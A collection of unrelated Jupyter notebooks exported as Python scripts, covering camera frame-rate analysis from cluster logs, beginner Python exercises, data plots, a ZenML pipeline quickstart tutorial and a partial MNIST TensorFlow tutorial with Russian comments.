# for dd in data_dirs: print dd
##### 10FPS
# log_dirs=sorted([root_dir+'/'+d for d in os.listdir(root_dir) if d.startswith('rec_10_')])
# data_dirs=sorted([data_dir+'/'+d for d in os.listdir(data_dir) if d.startswith('rec_10_')])
# log_dirs=[l for dd in data_dirs for l in log_dirs if os.path.basename(l) in dd ]
# print "log_dirs: "
# for ld in log_dirs: print ld
# print "data_dirs: "
# for dd in data_dirs: print dd
##### 20FPS
log_dirs=sorted([root_dir+'/'+d for d in os.listdir(root_dir) if d.startswith('rec_20_')])
data_dirs=sorted([data_dir+'/'+d for d in os.listdir(data_dir) if d.startswith('rec_20_')])
log_dirs=[l for dd in data_dirs for l in log_dirs if os.path.basename(l) in dd ]
print "log_dirs: "
for ld in log_dirs: print ld
print "data_dirs: "
for dd in data_dirs: print dd
assert len(log_dirs) == len(data_dirs)
# -
# extract frame rates for each run of each log dir
results={}
for index,dd in enumerate(data_dirs):
print os.path.basename(dd)
# extract hosts:
import subprocess, shlex
log_files=[log_dirs[index]+'/condor/'+f for f in os.listdir(log_dirs[index]+'/condor/') if f.endswith('log')]
host_list=[l.split(' ')[8].split(':')[0][1:] for l in open(log_files[0],'r').readlines() if 'executing on host' in l]
host_names=[]
for host in host_list: host_names.append(subprocess.check_output(shlex.split('host '+host)).split(' ')[4].split('.')[0])
for h in host_names: print h
image_files=sorted([dd+'/'+d+'/images.txt' for d in os.listdir(dd) if os.path.isdir(dd+'/'+d) and d.startswith('0')])
mean={'canyon':[],'forest':[],'sandbox':[],'total':[]}
var={'canyon':[],'forest':[],'sandbox':[],'total':[]}
for i_f in image_files:
try:
# i_f=image_files[0]
# print(i_f)
time_stamps= [ float(l.split(' ')[0].split(':')[0][:-1])+float(l.split(' ')[0].split(':')[1][:-2])*10**-9 for l in open(i_f,'r').readlines() if 'RGB' in l]
frame_rates = [1/(time_stamps[i+1]-time_stamps[i]+0.01) if time_stamps[i] != time_stamps[i+1] else np.nan for i in range(len(time_stamps)-1)]
if 'canyon' in i_f:
mean['canyon'].append(np.nanmean(frame_rates))
var['canyon'].append(np.nanvar(frame_rates))
elif 'sandbox' in i_f:
mean['sandbox'].append(np.nanmean(frame_rates))
var['sandbox'].append(np.nanvar(frame_rates))
elif 'forest' in i_f:
mean['forest'].append(np.nanmean(frame_rates))
var['forest'].append(np.nanvar(frame_rates))
mean['total'].append(np.nanmean(frame_rates))
var['total'].append(np.nanvar(frame_rates))
# plt.subplot(1,2,1)
# plt.hist(frame_rates)
# plt.subplot(1,2,2)
# plt.plot(frame_rates)
# plt.show()
except:
pass
results[os.path.basename(dd)]={'machines': host_names, 'mean':mean, 'var': var}
# Print results in md table format
msg=""
for r in sorted(results.keys()):
# print r
msg="{0} | {1} ".format(msg, results[r]['machines'][0])
print msg,"| "
for w in "canyon", "forest", "sandbox", "total":
msg=w+" "
for r in sorted(results.keys()):
# print r
msg="{0} | {1:0.2f} ({2:0.2f}) ".format(msg, np.nanmean(results[r]['mean'][w]), np.nanmean(results[r]['var'][w]))
print msg,"| "
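The timestamp-difference frame-rate computation used above can be checked standalone on made-up timestamps (omitting the original's +0.01 smoothing term for clarity):

```python
import numpy as np

# Made-up RGB frame timestamps in seconds; duplicate stamps yield NaN as above
ts = [0.00, 0.05, 0.10, 0.10, 0.20]
rates = [1.0 / (ts[i + 1] - ts[i]) if ts[i + 1] != ts[i] else np.nan
         for i in range(len(ts) - 1)]
print(np.nanmean(rates))  # mean of 20, 20, 10 fps
```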
# +
for i,w in enumerate(["canyon", "forest", "sandbox", "total"]):
plt.figure(figsize=(15,20))
plt.subplot(8,2,i*2+1)
plt.ylim=(0,40)
plt.bar([results[r]['machines'][0] for r in sorted(results.keys())],
[np.mean(results[r]['mean'][w]) for r in sorted(results.keys())])
plt.subplot(8,2,i*2+2)
plt.ylim=(0,500)
plt.bar([results[r]['machines'][0] for r in sorted(results.keys())],
[np.mean(results[r]['var'][w]) for r in sorted(results.keys())])
plt.show()
# -
results={}
# Extract frame rate by counting the average number of images saved for each environment
for index,dd in enumerate(data_dirs):
print(os.path.basename(dd))
# extract hosts:
import subprocess, shlex
log_files=[log_dirs[index]+'/condor/'+f for f in os.listdir(log_dirs[index]+'/condor/') if f.endswith('log')]
host_list=[l.split(' ')[8].split(':')[0][1:] for l in open(log_files[0],'r').readlines() if 'executing on host' in l]
host_names=[]
for host in host_list: host_names.append(subprocess.check_output(shlex.split('host '+host)).decode().split(' ')[4].split('.')[0])
for h in host_names: print(h)
mean={'canyon':[],'forest':[],'sandbox':[]}
# duration={'canyon':[],'forest':[],'sandbox':[]}
run_dirs=[dd+'/'+rd for rd in os.listdir(dd) if rd.startswith('0')]
for rd in run_dirs:
try:
begin=os.path.getmtime(rd+'/RGB/'+sorted(os.listdir(rd+'/RGB'))[0])
end=os.path.getmtime(rd+'/RGB/'+sorted(os.listdir(rd+'/RGB'))[-1])
if 'canyon' in rd:
mean['canyon'].append(len(os.listdir(rd+'/RGB'))/(end-begin))
# duration['canyon'].append(end-begin)
elif 'sandbox' in rd:
mean['sandbox'].append(len(os.listdir(rd+'/RGB'))/(end-begin))
# duration['sandbox'].append(end-begin)
elif 'forest' in rd:
mean['forest'].append(len(os.listdir(rd+'/RGB'))/(end-begin))
# duration['forest'].append(end-begin)
    except Exception:
        pass  # skip runs without readable RGB images
results[os.path.basename(dd)]={'machines': host_names, 'mean':mean}
# print result table wise
# Print results in md table format
msg="| "
for r in sorted(results.keys()):
# print r
msg="{0} | {1} ".format(msg, results[r]['machines'][0])
print(msg, "| ")
for w in "canyon", "forest", "sandbox":
msg="| "+w+" "
for r in sorted(results.keys()):
# print r
msg="{0} | {1:0.2f} ({2:0.2f}) ".format(msg, np.mean(results[r]['mean'][w]), np.var(results[r]['mean'][w]))
print(msg, "| ")
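The timestamp-difference frame-rate computation above can be sketched in isolation; the timestamps below are made-up values, and the smoothing constant is omitted for clarity:

```python
import numpy as np

# Hypothetical per-frame timestamps in seconds; the duplicated value
# mimics two log lines sharing a timestamp, which would divide by zero
time_stamps = [0.0, 0.034, 0.066, 0.100, 0.100, 0.135]

# Instantaneous frame rate between consecutive frames; equal timestamps
# are recorded as NaN and later ignored by the nan-aware statistics
frame_rates = [
    1.0 / (time_stamps[i + 1] - time_stamps[i])
    if time_stamps[i + 1] != time_stamps[i] else np.nan
    for i in range(len(time_stamps) - 1)
]

mean_fps = np.nanmean(frame_rates)
var_fps = np.nanvar(frame_rates)
print(round(mean_fps, 2))
```

`np.nanmean`/`np.nanvar` make the dropped-frame gaps harmless instead of skewing the statistics.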
| scripts/examin_framerates.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
#Write a Python Program to Find the Factorial of a Number?
num = int(input("Enter a Number to find factorial : "))
factorial = 1
if num < 0:
print("Cannot calculate the factorial of a negative number")
elif num == 0:
print("Factorial of zero is 1")
else:
for i in range(1,num+1):
factorial = factorial * i
print("Factorial of {} is {}".format(num, factorial))
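The same computation can be packaged as a reusable function and cross-checked against the standard library:

```python
import math

def factorial(n):
    """Iterative factorial; raises ValueError for negative input."""
    if n < 0:
        raise ValueError("factorial is undefined for negative numbers")
    result = 1
    for i in range(2, n + 1):
        result *= i
    return result

print(factorial(5))  # 120
print(factorial(5) == math.factorial(5))  # True
```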
# +
#2. Write a Python Program to Display the multiplication Table?
num = int(input("Enter a Number to find table : "))
for i in range(1,11):
print("{} X {} = {}".format(num,i,i*num))
# +
#3. Write a Python Program to Print the Fibonacci sequence?
sequence = int(input("enter a number to find the fibonacci series : "))
count = 0
a , b = 0,1
if sequence <= 0:
print("Please enter a positive number")
elif sequence == 1:
print("First", sequence, "Fibonacci numbers:")
print(a)
else:
print("First", sequence, "Fibonacci numbers:")
while count < sequence:
print(a, end=" ")
c = a + b
a,b = b, c
count+=1
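A generator makes the same sequence reusable and avoids the counter bookkeeping; this is a sketch, not part of the original assignment:

```python
def fibonacci(n):
    """Yield the first n Fibonacci numbers, starting from 0."""
    a, b = 0, 1
    for _ in range(n):
        yield a
        a, b = b, a + b

print(list(fibonacci(8)))  # [0, 1, 1, 2, 3, 5, 8, 13]
```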
# +
#4. Write a Python Program to Check Armstrong Number?
num = int(input("Enter the number : "))
power = len(str(num))
temp = num
sum = 0
while temp > 0:
digit = temp % 10
sum = sum + digit ** power
temp = temp//10
if num == sum :
print("Number is armstrong number")
else:
print("Not an armstrong number")
# +
#5. Write a Python Program to Find Armstrong Number in an Interval?
low = int(input("Lower limit : "))
up = int(input("Upper limit : "))
for num in range(low,up+1):
power = len(str(num))
temp = num
sum = 0
while temp > 0:
digit = temp % 10
sum = sum + digit ** power
temp = temp//10
if num == sum :
print(num)
# -
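The digit-power check used in both Armstrong cells can be factored into a small predicate; the range below is an arbitrary example:

```python
def is_armstrong(num):
    """True if num equals the sum of its digits each raised to the digit count."""
    power = len(str(num))
    return num == sum(int(d) ** power for d in str(num))

print([n for n in range(1, 1000) if is_armstrong(n)])
# [1, 2, 3, 4, 5, 6, 7, 8, 9, 153, 370, 371, 407]
```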
#6. Write a Python Program to Find the Sum of Natural Numbers?
num = int(input("enter the number : "))
sum = 0
for i in range(0,num+1):
sum+=i
print("Sum of natural numbers upto {} is {}".format(num,sum))
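The loop can be checked against Gauss's closed form n(n+1)/2, which computes the same sum without iterating:

```python
def sum_natural(n):
    """Closed form for 1 + 2 + ... + n."""
    return n * (n + 1) // 2

n = 100
assert sum_natural(n) == sum(range(1, n + 1))
print(sum_natural(n))  # 5050
```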
| Programming_Assingment_4.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import os
import pandas as pd
import matplotlib.pyplot as plt
from scipy.stats import boxcox
# Get File Directory
WORK_DIR = os.getcwd()
# Load the CSV data into a pandas DataFrame
DATA = pd.read_csv(WORK_DIR + "/daily_orders.csv")
DATA.date = pd.to_datetime(DATA['date'], format='%Y-%m-%d %H:%M:%S')
DATA['boxcox'], lam = boxcox(DATA['value'])
# set_index with inplace=True mutates DATA directly; without it,
# set_index returns a new copy that would have to be assigned back
DATA.set_index('date', inplace=True)
# Plot DATA
DATA.plot(subplots=True, layout=(2, 1), figsize=(9, 9))
plt.show()
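For reference, the transform that `scipy.stats.boxcox` fits can be written out directly; this sketch fixes the λ parameter by hand instead of estimating it from the data:

```python
import numpy as np

def boxcox_transform(x, lam):
    """Box-Cox: (x**lam - 1)/lam for lam != 0, log(x) for lam == 0."""
    x = np.asarray(x, dtype=float)
    if lam == 0:
        return np.log(x)
    return (x ** lam - 1.0) / lam

def boxcox_inverse(y, lam):
    """Invert the transform to recover the original positive values."""
    y = np.asarray(y, dtype=float)
    if lam == 0:
        return np.exp(y)
    return (lam * y + 1.0) ** (1.0 / lam)

x = np.array([1.0, 2.0, 5.0, 10.0])
y = boxcox_transform(x, 0.5)
print(np.allclose(boxcox_inverse(y, 0.5), x))  # True
```

`scipy.special.inv_boxcox` plays the role of `boxcox_inverse` when you use the library version.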
| notebooks/Current.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python3
# ---
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
# # Training history analysis
#
# ## baseB+
#
# * weight initialization = imagenet
# * batch size = 64
# * training instances = 40k (balanced)
# * validation instances = ~5k (balanced)
# * epochs = 15 (w/ early stopping)
# * performance on test set = 0.9212
#
# January 31st
df_92 = pd.read_csv('Colab_92acc_finetuning.csv')
df_92.index += 1
df_92.head()
plt.plot(df_92['loss'])
plt.plot(df_92['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
plt.plot(df_92['acc'])
plt.plot(df_92['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
# ## baseB
#
# * weight initialization = random
# * batch size = 64
# * training instances = 40k (balanced)
# * validation instances = ~5k (balanced)
# * epochs = 15 (w/ early stopping)
# * performance on test set = 0.9089
#
# January 30th
df_base = pd.read_csv('Colab_91acc.csv')
df_base.index += 1
df_base.head()
plt.plot(df_base['loss'])
plt.plot(df_base['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
plt.plot(df_base['acc'])
plt.plot(df_base['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
# ## Naive-Pruned Model
#
# * weight initialization = imagenet
# * batch size = 64
# * training instances = 56k
# * validation instances = 7k
# * epochs = 15 (w/ early stopping)
# * performance on balanced test set = 0.9194
#
# February 20th
df_prun = pd.read_csv('Colab_91acc_pruned.csv')
df_prun.index += 1
df_prun.head()
plt.plot(df_prun['loss'])
plt.plot(df_prun['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
plt.plot(df_prun['acc'])
plt.plot(df_prun['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
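The three loss/accuracy cells repeat the same plotting code; a small helper (a sketch, assuming the history CSVs keep the `loss`/`val_loss`-style column names) removes the duplication:

```python
import matplotlib.pyplot as plt

def plot_history(df, metric):
    """Plot train/validation curves for one metric of a Keras history frame."""
    ax = plt.gca()
    ax.plot(df[metric], label="train")
    ax.plot(df["val_" + metric], label="valid")
    ax.set_title("model " + metric)
    ax.set_xlabel("epoch")
    ax.set_ylabel(metric)
    ax.legend(loc="upper left")
    return ax
```

Usage would then be e.g. `plot_history(df_92, "loss"); plt.show()`.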
| transfer/plots/Plots.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.9.7 ('food')
# language: python
# name: python3
# ---
# %load_ext autoreload
# %autoreload 2
# +
from food.tools import *
from food.paths import *
from food.psql import *
import pandas as pd
import numpy as np
import food.custom_pandas as cpd
from tqdm import tqdm
import requests
# # !nbdev_build_lib
# -
# search best match of food classes to images (5)
#
# - request glovo api for best match
# - create sql table corresponding photo_clips
# - save clips to sql table
# +
query = f"""select f.id, f.text, f.description from food.foods_prompted f
left join food.foods_prompted_images i on (f.id = i.food_id)
where i.clip is null"""
bs = 1
total = engine.execute(f'select count(*) from ({query}) a').one()
pd_iter = cpd.read_sql_query(query, engine, chunksize=1, index_col='id')
for df in tqdm(pd_iter, desc=f"clip image inference {schema}", total=total[0] // bs):
food_id = df.iloc[0].name
text = df.iloc[0]['text']
description = df.iloc[0]['description']
url = f"http://localhost:8184/search"
r_df = pd.read_json(requests.post(url,params={'text':text,'topk':5,'return_clip':True}).json())[['country_code','store_name','product_name','path','accuracy','clip']]
r_df['food_id'] = food_id
r_df.to_sql('foods_prompted_images', engine, if_exists='append',schema=schema,index=False)
# -
#
| classifying_glovo_images.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Creating your first pipeline
# This is the notebook version of our [Quickstart](../getting-started/quickstart.md)! Our goal here is to help you to get the first practical experience with our tool and give you a brief overview on some basic functionalities of **ZenML**.
#
# In this example, we will create a simple pipeline featuring a local CSV dataset and a basic feedforward neural network, and run it in our local environment. If you want to run this notebook in an interactive environment, feel free to [run it in Google Colab](https://colab.research.google.com/github/maiot-io/zenml/blob/main/docs/book/tutorials/simple-classification.ipynb).
# ## First things first...
# You can install **ZenML** through:
#
# ```
# pip install zenml
# ```
#
# Once the installation is completed, you can go ahead and create your first **ZenML** repository for your project. As **ZenML** repositories are built on top of Git repositories, you can create yours in a desired empty directory through:
#
# ```
# git init
# zenml init
# ```
#
# Now, the setup is completed. For the next steps, just make sure that you are executing the code within your **ZenML** repository.
# ## Creating the pipeline
# Once you set everything up, we can start our tutorial. The first step is to create an instance of a pipeline. **ZenML** comes equipped with different types of pipelines, but for this example we will be using the most classic one, namely a `TrainingPipeline`.
#
# While creating your pipeline, you can give it a name and use that name to reference the pipeline later.
# +
from zenml.pipelines import TrainingPipeline
training_pipeline = TrainingPipeline(name='QuickstartPipeline')
# -
# In a **ZenML** `TrainingPipeline`, there is a fixed set of steps representing the processes, which can be found in any machine learning workflow. These steps include:
#
# 1. **Split**: responsible for splitting your dataset into smaller datasets such as train, eval, etc.
# 2. **Transform**: responsible for the preprocessing of your data
# 3. **Train**: responsible for the model creation and training process
# 4. **Evaluate**: responsible for the evaluation of your results
# ## Creating a datasource
# However, before we dive into the aforementioned steps, let's briefly talk about our dataset.
#
# For this quickstart, we will be using the *Pima Indians Diabetes Dataset* and on it, we will train a model which will aim to predict whether a person has diabetes based on diagnostic measures.
#
# In order to be able to use this dataset (which is currently in CSV format) in your **ZenML** pipeline, we first need to create a `datasource`. **ZenML** has built-in support for various types of datasources and for this example you can use the `CSVDatasource`. All you need to provide is a `name` for the datasource and the `path` to the CSV file.
# +
from zenml.datasources import CSVDatasource
ds = CSVDatasource(name='Pima Indians Diabetes Dataset',
path='gs://zenml_quickstart/diabetes.csv')
# -
# Once you are through, you will have created a tracked and versioned datasource and you can use this datasource in any pipeline. Go ahead and add it to your pipeline.
training_pipeline.add_datasource(ds)
# ## Configuring the split
# Now, let us get back to the **four** essential steps where the first step is the **Split**.
#
# For the sake of simplicity in this tutorial, we will be using a completely random `70-30` split into a train and evaluation dataset.
# +
from zenml.steps.split import RandomSplit
training_pipeline.add_split(RandomSplit(split_map={'train': 0.7,
'eval': 0.3}))
# -
# Keep in mind, in a more complicated example, it might be necessary to apply a different splitting strategy. For these cases, you can use the other built-in split configuration **ZenML** offers or even implement your own custom logic into the split step.
# ## Handling data preprocessing
# The next step is to configure the step **Transform**, the data preprocessing.
#
# For this example, we will use the built-in `StandardPreprocesser`. It handles feature selection and provides sane preprocessing defaults for each data type, such as standardization for numerical features or vocabularization for non-numerical features.
#
# In order to use it, you need to provide a list of feature names and a list of label names. Moreover, if you do not want it to use the default transformation for a feature, or you want to overwrite it with a different preprocessing method, this is also possible, as we do in this example.
# +
from zenml.steps.preprocesser import StandardPreprocesser
training_pipeline.add_preprocesser(
StandardPreprocesser(
features=['times_pregnant',
'pgc',
'dbp',
'tst',
'insulin',
'bmi',
'pedigree',
'age'],
labels=['has_diabetes'],
overwrite={'has_diabetes': {
'transform': [{'method': 'no_transform',
'parameters': {}}]}}))
# -
# Much like the splitting process, you might want to work on cases, where the capabilities of the `StandardPreprocesser` do not match your task at hand. In this case, you can create your own custom preprocessing step, but we will go into that topic in a different tutorial.
# ## Training your model
# As the data is now ready, we can move onto the step **Train**, the model creation and training.
#
# For this quickstart, we will be using the simple built-in `FeedForwardTrainer` step and as the name suggests, it represents a feedforward neural network, which is configurable through a set of variables.
# +
from zenml.steps.trainer import TFFeedForwardTrainer
training_pipeline.add_trainer(TFFeedForwardTrainer(loss='binary_crossentropy',
last_activation='sigmoid',
output_units=1,
metrics=['accuracy'],
epochs=20))
# -
# Of course, not every machine learning problem is solvable by a simple feedforward neural network, and most of the time you will need a model tailored to the problem at hand. That is why we created an interface where users can implement their own custom models and integrate them in a trainer step. However, this approach is not within the scope of this tutorial, and you can learn more about it in our docs and the upcoming tutorials.
# ## Evaluation of the results
# The last step to configure in our pipeline is the **Evaluate**.
#
# For this example, we will be using the built-in `TFMAEvaluator` which uses [Tensorflow Model Analysis](https://www.tensorflow.org/tfx/model_analysis/get_started) to compute metrics based on your results (possibly within slices).
# +
from zenml.steps.evaluator import TFMAEvaluator
training_pipeline.add_evaluator(
TFMAEvaluator(slices=[['has_diabetes']],
metrics={'has_diabetes': ['binary_crossentropy',
'binary_accuracy']}))
# -
# ## Running your pipeline
# Now that everything is set, go ahead and run the pipeline and, with it, your steps.
training_pipeline.run()
# With the execution of the pipeline, you should see the logs informing you about each step along the way. In more detail, you should first see that your dataset is ingested through the component *DataGen* and then split by the component *SplitGen*. Afterwards, data preprocessing takes place with the component *Transform*, leading into the main training component *Trainer*. Ultimately, the results are evaluated by the component *Evaluator*.
# ## Post-training functionalities
# Once the training pipeline is finished, you can check the outputs of your pipeline in different ways.
# ### Dataset
# As the data is now ingested, you can go ahead and take a peek into your dataset. You can achieve this by simply getting the datasources registered to your repository and calling the method `sample_data`.
# +
from zenml.repo import Repository
repo = Repository.get_instance()
datasources = repo.get_datasources()
datasources[0].sample_data()
# -
# ### Statistics
# Furthermore, you can check the statistics which are yielded by your datasource and split configuration through the method `view_statistics`. By using the `magic` flag, we can even achieve this right here in this notebook.
training_pipeline.view_statistics(magic=True)
# ### Evaluate
# On the other hand, if you want to evaluate the results of your training process, you can use the `evaluate` method of your pipeline.
#
# Much like the `view_statistics`, if you execute `evaluate` with the `magic` flag, it will help you continue in this notebook and generate two new cells, each set up with a different evaluation tool:
#
# 1. **Tensorboard** can help you to understand the behaviour of your model during the training session
# 2. **TFMA** or **tensorflow_model_analysis** can help you assess your already trained model based on given metrics and slices on the evaluation dataset
#
# *Note*: if you want to see the sliced results, comment in the last line and adjust it according to the slicing column. In the end it should look like this:
# ```
# tfma.view.render_slicing_metrics(evaluation, slicing_column='has_diabetes')
# ```
training_pipeline.evaluate(magic=True)
# ... and this is it for the quickstart. If you came here without a hiccup, you must have successfully installed ZenML, set up a ZenML repo, registered a new datasource, configured a training pipeline, executed it locally, and evaluated the results. And this is just the tip of the iceberg of the capabilities of **ZenML**.
#
# However, if you had a hiccup or you have some suggestions/questions regarding our framework, you can always check our [docs](https://docs.zenml.io/) or our [github](https://github.com/maiot-io/zenml) or even better join us on our [Slack](https://zenml.io/slack-invite) channel.
#
# Cheers!
| docs/book/tutorials/creating-first-pipeline.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:Py3Env]
# language: python
# name: conda-env-Py3Env-py
# ---
# ### Graphs
#
steering_values_100_file = open("../data/steering_vals_100.txt", "r")
steering_values_500_file = open("../data/steering_vals_500.txt", "r")
steering_values_600_file = open("../data/steering_vals_600.txt", "r")
steering_values_700_file = open("../data/steering_vals_700.txt", "r")
steering_values_100 = steering_values_100_file.readlines()
steering_values_500 = steering_values_500_file.readlines()
steering_values_600 = steering_values_600_file.readlines()
steering_values_700 = steering_values_700_file.readlines()
print(len(steering_values_100))
print(len(steering_values_500))
print(len(steering_values_600))
print(len(steering_values_700))
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_100) + 1))
y = [float(v) for v in steering_values_100]
plotly.offline.iplot({
    "data": [go.Scatter(x=x, y=y)],
    "layout": go.Layout(title="Steering values with 100 penalty")
})
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_500) + 1))
y = [float(v) for v in steering_values_500]
plotly.offline.iplot({
    "data": [go.Scatter(x=x, y=y)],
    "layout": go.Layout(title="Steering values with 500 penalty")
})
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_600) + 1))
y = [float(v) for v in steering_values_600]
plotly.offline.iplot({
    "data": [go.Scatter(x=x, y=y)],
    "layout": go.Layout(title="Steering values with 600 penalty")
})
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_700) + 1))
y = [float(v) for v in steering_values_700]
plotly.offline.iplot({
    "data": [go.Scatter(x=x, y=y)],
    "layout": go.Layout(title="Steering values with 700 penalty")
})
# -
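`readlines()` returns strings, so the values read above are text until converted; a small parsing helper (shown here with made-up sample lines) turns them into floats and skips blank lines:

```python
def parse_steering_values(lines):
    """Convert raw text lines (one numeric value per line) to floats, skipping blanks."""
    return [float(line) for line in lines if line.strip()]

sample = ["0.12\n", "-0.05\n", "\n", "0.30\n"]
print(parse_steering_values(sample))  # [0.12, -0.05, 0.3]
```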
| src/Visualization.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + pycharm={"name": "#%%\n"}
import os
from tensorflow.python.keras.utils.np_utils import to_categorical
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
# mnist lives inside keras, which itself ships with tensorflow
from keras.datasets import mnist
import matplotlib.pyplot as plt
print(tf.__version__)
# + pycharm={"name": "#%%\n"}
# Load the training and test sets using the load_data() function:
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# + pycharm={"name": "#%%\n"}
# Check how much data was loaded
print("Training set: x samples:", len(x_train), "y targets:", len(y_train))
print("Test set: x samples:", len(x_test), "y targets:", len(y_test))
# + pycharm={"name": "#%%\n"}
# Look at what is inside the training data:
n1 = 5555  # pick an index from 0 to 59999
plt.imshow((255 - x_train[n1]), cmap="gray")
print(x_train[n1])
# + pycharm={"name": "#%%\n"}
# rescale grayscale values from 0..255 to the range 0..1
x_train = x_train / 255
x_test = x_test / 255
print("Training data shape: ", tf.shape(x_train).numpy())
# + pycharm={"name": "#%%\n"}
# flatten the array, turning each 28x28 square into a linear vector
# [-1, 28*28] means every 28-by-28 matrix is unrolled into 28*28
# values, while the size along the first axis (the -1) is inferred
# automatically
x_train = tf.reshape(tf.cast(x_train, tf.float32), [-1, 28 * 28])
x_test = tf.reshape(tf.cast(x_test, tf.float32), [-1, 28 * 28])
print("New shape: ", tf.shape(x_train).numpy())
# + pycharm={"name": "#%%\n"}
# convert the target values
# y_train[i] is the digit to recognize, e.g. 3
# We turn it into the array [0 0 0 1 0 0 0 0 0 0],
# where the 1 sits at position 3. These are the target outputs
# of the last-layer neurons, so that exactly the neuron with
# number 3 responds to an image of the digit 3.
# The helper function to_categorical performs this conversion;
# the resulting format is called a one-hot vector.
print("Target value before conversion:", y_train[n1])
# + pycharm={"name": "#%%\n"}
y_train = to_categorical(y_train, 10)
# + pycharm={"name": "#%%\n"}
print("Target value after conversion:", y_train[n1])
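`to_categorical` can be reproduced with plain NumPy indexing; this hypothetical `to_one_hot` is only an illustration of what the Keras helper does:

```python
import numpy as np

def to_one_hot(labels, num_classes):
    """One-hot encode integer labels, like keras's to_categorical."""
    labels = np.asarray(labels)
    out = np.zeros((labels.size, num_classes))
    out[np.arange(labels.size), labels] = 1.0  # set one 1 per row
    return out

print(to_one_hot([3], 10)[0])
# [0. 0. 0. 1. 0. 0. 0. 0. 0. 0.]
```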
# + pycharm={"name": "#%%\n"}
# Define the layer model
class DenseNN(tf.Module):
    # Constructor: stores the initial settings
    def __init__(self, outputs, activate="relu"):
        super().__init__()
        self.outputs = outputs  # number of outputs = number of neurons in the layer
        self.activate = activate  # activation function type (relu by default)
        self.fl_init = False  # becomes True after the weights are first initialized

    # Compute the layer's output values
    def __call__(self, x):
        if not self.fl_init:  # no weights yet, so create them randomly
            self.w = tf.random.truncated_normal((x.shape[-1], self.outputs), stddev=0.1, name="w")
            self.b = tf.zeros([self.outputs], dtype=tf.float32, name="b")
            # The tensor w has shape (x.shape[-1], self.outputs):
            # x.shape[-1] is the size of the input vector, so as many
            # weights per neuron are created as there are inputs on the
            # first call; the first index is therefore the input number.
            # The second size, self.outputs, equals the number of outputs
            # and the number of neurons in the layer, so the second index
            # is the neuron number.
            # stddev=0.1 is the standard deviation.
            # wrap w and b in tf.Variable
            self.w = tf.Variable(self.w)
            self.b = tf.Variable(self.b)
            self.fl_init = True
        # matrix computation of the layer output
        y = x @ self.w + self.b
        if self.activate == "relu":
            return tf.nn.relu(y)
        elif self.activate == "softmax":
            return tf.nn.softmax(y)
        return y
# + pycharm={"name": "#%%\n"}
# create two dense layers, with 128 and 10 neurons
layer_1 = DenseNN(128)
layer_2 = DenseNN(10, activate="softmax")
# + pycharm={"name": "#%%\n"}
# Compute the values at the network's output
def model_predict(x):
    y = layer_1(x)
    y = layer_2(y)
    return y  # layer_2(layer_1(x))
# + pycharm={"name": "#%%\n"}
# Define the loss function
cross_entropy = lambda y_true, y_pred: tf.reduce_mean(tf.losses.categorical_crossentropy(y_true, y_pred))
# y_true, y_pred are batches of one-hot vectors of mini-batch size
# + pycharm={"name": "#%%\n"}
# choose an optimizer for gradient descent
opt = tf.optimizers.Adam(learning_rate=0.001)
# opt = tf.optimizers.SGD(learning_rate=0.02)
# opt = tf.optimizers.SGD(momentum=0.5, learning_rate=0.02)  # momentum method
# opt = tf.optimizers.SGD(momentum=0.5, nesterov=True, learning_rate=0.02)  # Nesterov method
# opt = tf.optimizers.Adagrad(learning_rate=0.1)  # Adagrad
# opt = tf.optimizers.Adadelta(learning_rate=1.0)  # Adadelta
# opt = tf.optimizers.RMSprop(learning_rate=0.01)
# opt = tf.optimizers.Adam(learning_rate=0.1)
# + pycharm={"name": "#%%\n"}
# Prepare for training
BATCH_SIZE = 32
EPOCHS = 10
TOTAL = x_train.shape[0]
print(TOTAL)  # number of samples in the training set
# + pycharm={"name": "#%%\n"}
# tf.data.Dataset is a class holding a set of training data.
# It can be built from Python lists with the from_tensor_slices method,
